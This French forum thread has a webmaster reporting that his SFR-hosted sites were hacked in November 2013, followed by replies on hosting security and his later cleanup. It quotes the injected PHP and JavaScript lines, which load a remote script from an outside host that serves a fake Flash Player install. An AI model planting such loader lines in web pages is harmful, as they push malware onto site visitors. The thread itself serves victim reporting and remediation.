Rapport de piratage des pages perso SFR

Noir Foncé · Décembre 01, 2013, 15:25:56

Bonjour,
le 28/11/2013 aux environs de 8h00, les pages index.php et tous les scripts .js de mes sites ont été modifiés automatiquement pour y ajouter en fin de page les lignes suivantes (ou équivalent) :

Citation<?php
#86f320#
if(empty($ef)) {
$ef = "<script src=\"http://praxis-panzer.de/images/h2JcgD7o.php?id=59472105\" type=\"text/javascript\"></script>";
echo $ef;
}

#/86f320#
?>
<?php

?>
<?php

?>

ou bien (sur un .js) :

Citation/*21a75a*/
document.write('<script src="http://praxis-panzer.de/images/h2JcgD7o.php?id=59472096" type="text/javascript"></script>');
/*/21a75a*/

Certains scripts ainsi modifiés ne fonctionnent plus.
Je pense que le site praxis-panzer.de ici mis en référence n'y est pour rien, c'est simplement lui aussi une victime de piratage.

Par ailleurs, des fichiers .ftpquota ont été ajoutés sur la racine et des fichiers ftes_xxxx.html l'ont été dans les dossiers.
Les fichiers de type ftes_xxxx.html ont été ajoutés à une date variable en octobre, mais ne contiennent que :

Citation<html>
<h1>1-1html2-2</h1>
</html>

Les fichiers .ftpquota (16 octets) ajoutés le 28/11 ne sont ni éditables ni supprimables. Ils sont gérés par le serveur Apache SFR ; je ne sais pas ce qu'ils peuvent contenir.

Il s'agit bien d'un piratage à travers le serveur SFR : je n'ai pas accédé à mes sites sur les pages perso SFR le 28/11, tous mes sites sont touchés et tous les scripts .js et pages index.php ont été altérés, quels que soient les dossiers. Les pages d'un autre nom n'ont pas été modifiées.

Tout ça m'oblige à une petite séance de nettoyage pour réimporter les pages et scripts originaux et rendre le site de nouveau fonctionnel.
Si vous êtes hébergés chez SFR, jetez un coup d'œil à vos sites pour voir si vous avez été vous aussi victimes de ce piratage.

N'hésitez pas à reporter ici votre expérience ou me donner une piste d'explications.

Cordialement,

Noir Foncé · Décembre 01, 2013, 15:50:58

Complément : tous les fichiers .html sont aussi touchés.

Les lignes ajoutées sur les pages forcent l'ouverture d'une fenêtre popup qui invite à installer Flash Player (!) avec de jolis liens bien appétissants...
Un piège à c.. donc.

Piratage confirmé.

restoc · Décembre 01, 2013, 17:57:02

Merci çà fait froid dans le dos de ceux qui ont des sites et pas seulement chez SFR.

nidob24 · Décembre 03, 2013, 09:03:31

Je gère plusieurs sites qui sont hébergés chez AMEN et chez OVH, et je n'ai jamais eu ce genre de problème.

restoc · Décembre 03, 2013, 13:57:10

Citation de: nidob24 le Décembre 03, 2013, 09:03:31
Je gère plusieurs sites qui sont hébergés chez AMEN et chez OVH, et je n'ai jamais eu ce genre de problème.

La bonne question que tu dois te poser c'est: comment puis je protéger mes sites si Ovh et Amen sont attaqués aussi, non ?
SFR n'avait jamais eu le problème non plus moins d'1 seconde avant et aurait dit la même chose que toi!!

GregP · Décembre 04, 2013, 14:08:01

La seule solution pour se protéger est de posséder une copie du site. Ce genre de sabotage peut effectivement survenir chez n'importe quel hébergeur, c'est l'hebergeur lui même qui se fait pirater et non un utilisateur en particulier.

sledof · Décembre 10, 2013, 18:08:49

Salut,

Sans trouver la réponse aux causes de la modif de ces fichiers, c'est être certain que cela va recommencer ...

Voir si tu n'utilises pas un logiciel installé sur ton hébergement qui présente une faille (pas à jour, ...), vérifie si ta machine est bien propre elle aussi, et surtout évite d'enregistrer ton mot de passe ftp dans ton client ftp (lisible par les véroles faites pour).

Stéphane

Noir Foncé · Janvier 25, 2014, 16:09:34

Quelques nouvelles.
Tant que je n'avais pas modifié les choses, le piratage revenait régulièrement, comme annoncé.

J'ai donc nettoyé le site de ses scripts aux versions obsolètes, modifié le .htaccess et surtout, changé le mot de passe ftp.
J'ai aussi vérifié en profondeur la protection de mon PC (anti-virus, Ad-aware, Spybot S&D, rapport HijackThis, etc.), tout semblait correct. Je ne sais donc pas d'où venait le piratage.

Enfin, tout est rentré dans l'ordre, en tout cas avec un retour d'expérience de un mois.
Vous pouvez désormais revisiter mon site sans crainte !

Merci à tous.

FotoPlanet · Mars 15, 2014, 02:02:05

Pire encore, il y des boîtes d'assurances et banques qui ont des grosses failles.
L'une d'entre elles est mon assureur, je vais lui supprimer les autorisations de prélèvements avant d'en prendre une dans ma gueule.
Pour moi, terminé les boîtes mails gratuites, outlook, gmail etc. sauf pour le commun qui passera tranquillement sur une boîte payante.
Pour le job tout est crypté, pour les trop cons sur des boîtes normales de toutes façon ce ne sont pas eux qui me font crouter.
Bref de trèfle faut arrêter d'être naïf.